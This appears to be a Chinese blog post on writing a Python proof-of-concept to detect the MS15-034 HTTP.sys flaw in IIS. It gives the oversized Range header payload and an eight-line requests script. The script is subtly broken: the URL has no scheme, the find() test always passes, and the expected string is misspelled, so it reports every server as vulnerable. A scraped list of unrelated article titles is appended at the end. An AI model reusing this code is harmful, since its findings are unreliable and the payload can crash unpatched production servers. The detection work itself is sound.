作为单位的网络安全管理员,经常会遇到这样的情况,某些漏洞在互联网上被批露后,在用的扫描工具却无法及时集成。

遇到这种情况,领导会说:“自己想办法,抓紧检测是否有这个漏洞。”很多人会告诉你可以用自行编写Poc这个方法,指的就是根据漏洞的简单原理写出对应的漏洞检测代码,用来验证漏洞是否存在。那么如何编写Poc呢?可能你会把它想象的无比困难。

Python的出现,极大简化了Poc的编写过程,我们不需要再把时间浪费在网络连接、发送HTTP数据等繁琐的杂事上。以15年打击面最广的“HTTP.SYS远程执行代码漏洞”(ms15-034)为例,编写Poc只需要两个步骤。

第一步:简单了解漏洞触发机制

在网上可以搜索到,这个漏洞触发机制就是:使用IIS作为WEB容器可能存在编号为MS-15034的远程代码执行漏洞,可以发送测试代码,若返回“Requested Range Not Satisfiable”则证明存在此漏洞。

下面就是被公布的测试代码:

Host: stuff

Range: bytes=0-" + hexAllFfff

简单来说,要验证是否存在漏洞,只要把测试代码发送到目标服务器上,进行验证即可,而这就是利用Python编写Web漏洞检测工具(Poc)的过程。

第二步:用Python编写漏洞检测具体代码

代码只有8行,我进行了详细注释,直接贴出来。

import requests # 发送web请求所需的库

url = '127.0.0.1' # 需要测试的服务器IP

payload = {'Host':'stuff','Range':'bytes=0-18446744073709551615'} # 测试代码

r1 = requests.get(url, headers=payload) #发送测试代码

if str(r1.content).find('Requested Range Not Satisfialbe'): # 检查返回结果

print('{}有ms15-034漏洞'.format(url))

else:

print('{}不存在ms15-034漏洞'.format(url))

简单两步加上8行代码,就完成了一个ms15-034漏洞检测工具。当然,实际应用还有很多需要完善的地方,那就自己动手吧

python漏洞扫描器编写,用Python编写Web漏洞检测工具相关推荐

  1. 网络设备Web登录检测工具device-phamer

    网络设备Web登录检测工具device-phamer 为了便于管理和维护,大部分网络都提供了Web管理接口.Kali Linux提供了一款专用检测工具device-phamer.该工具可以批量检测IP ...

  2. web服务器检测工具

    简介: servicemonitor可以帮助用户自动监视Web服务器是否正常,是一个非常实用且专业的web服务器检测工具,能够及时发现iframe,script等异常代码被加入网页,及时发现服务器当机 ...

  3. python病毒扫描器_基于Python的病毒扫描机制

    构建集中式病毒扫描机制(ClamAV) Clam AntiVirus(ClamAV)是一款免费而且开源的防毒软件,软件与病毒库的更新皆有社区免费发布,官网地址:http://www.clamav.ne ...

  4. WEB渗透漏洞扫描【2】椰树Web漏洞扫描器(2)

    1.扫描工具图如下,操作也很简单. 2.具体操作:  3.以后如果实战使用,记录一次使用的实例.

  5. 小陈WEB漏洞扫描器 V2.0

    小陈WEB漏洞扫描器 V2.0 小陈WEB漏洞扫描器 V2.0 https://pan.baidu.com/s/1NSmFCyxowEa3YlOuhvtwwQ 转载于:https://www.cnbl ...

  6. 网络 /Web漏洞扫描

    目录 网络漏洞扫描 OpenVAS 的安装 OpenVAS 的使⽤ Web 漏洞扫描 AWVS AWVS 的使⽤: 创建扫描⽬标 创建扫描任务 开启扫描任务 导出扫描报告 通过网络漏洞扫描,全面掌握目 ...

  7. python的web压力测试工具-pylot安装使用

    pylot是python编写的一款web压力测试工具.使用比较简单.而且测试结果相对稳定. 这里不得不鄙视一下apache 的ab测试,那结果真是让人蛋疼,同样的url,测试结果飘忽不定,看得人心惊肉 ...

  8. 主流WEB漏洞扫描器种类及其指纹特征分析

    文章来源于信安旅途 Tips 文章最下方有小礼品噢~ 看完文章先嘛~ 0x01 Web漏洞扫描器 国内: 绿盟(WVSS):https://www.nsfocus.com.cn/html/2019/2 ...

  9. Web漏洞扫描工具(批量脱壳、反序列化、CMS)

    一.什么是Web漏洞扫描工具 即是指"扫描Web应用以查找安全漏洞(如跨站脚本,SQL注入,命令执行,目录遍历和不安全服务器配置)的自动化工具",其中许多可能是由不安全或不正确的编 ...

  10. 网络安全自学篇之Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具

    前言: Web渗透技术的核心是发现Web漏洞,发现漏洞有手工和软件自动化扫描两种方式.对于用户验证漏洞.用户凭证管理问题.权限特权及访问控制漏洞.缓存漏洞.跨站脚本漏洞.加密漏洞.路径切换漏洞.代码注 ...

最新文章

  1. python能做什么
  2. Thinkphp怎样修改模板标签定界符
  3. linux gcc 内联汇编入门
  4. SharedActivityContext要引用那个单元?
  5. mysql索引空间配置_加入空间mysql索引
  6. Github上影响力最大的十位Pythoner
  7. xshell更改背景颜色,解决乱码问题及更改字体及字体大小
  8. centos7优先wifi连接_WIFI明明已连接,但却无法上网,问题究竟出现在哪里?
  9. PAT乙级1030 完美数列 (25 分)
  10. 热点|国家动物健康与食品安全创新联盟成立科技创新赋能委员会 并首发动物源食品信任追溯平台...
  11. Mathematic的学习打卡day 8
  12. java中如何实例化一个接口_「实例化」java之接口实例化 - seo实验室
  13. linux配置4g网络命令_[4G]Linux平台上实现4G通信
  14. 基于FPGA的Yolov4 tiny目标检测网络加速器
  15. idea设置author注解
  16. 如何精确计算 LoRaWAN 终端电池寿命
  17. 计算机编程辅导班,昆明少儿计算机编程辅导班
  18. 未来可能的安全焦点:GIS地理信息系统安全问题分析
  19. 家里用服务器放在哪个位置,家用路由器放在什么位置比较合理?
  20. imx6ul uart8路串口调试(代码)

热门文章

  1. Pojo、Po、Vo、Dto的含义
  2. java用dockerfile生成镜像_【HAVENT原创】创建 Dockerfile 生成新的镜像,并发布到 DockerHub...
  3. js rsa验签_【HAVENT原创】前端使用 jsrsasign 进行 RSA 加密、解密、签名、验签
  4. Kafka报错:Couldn't find leaders for Set
  5. python批量写入经纬度
  6. 【目标检测】SPP-Net论文理解(超详细版本)
  7. 计算机word插图教案,《在Word中插入图片》优秀教学设计范文
  8. 服务器信息批量收集,如何批量导入或导出服务器信息
  9. python 循环十次_python循环10次怎么写
  10. 中英文双语切换小程序开发制作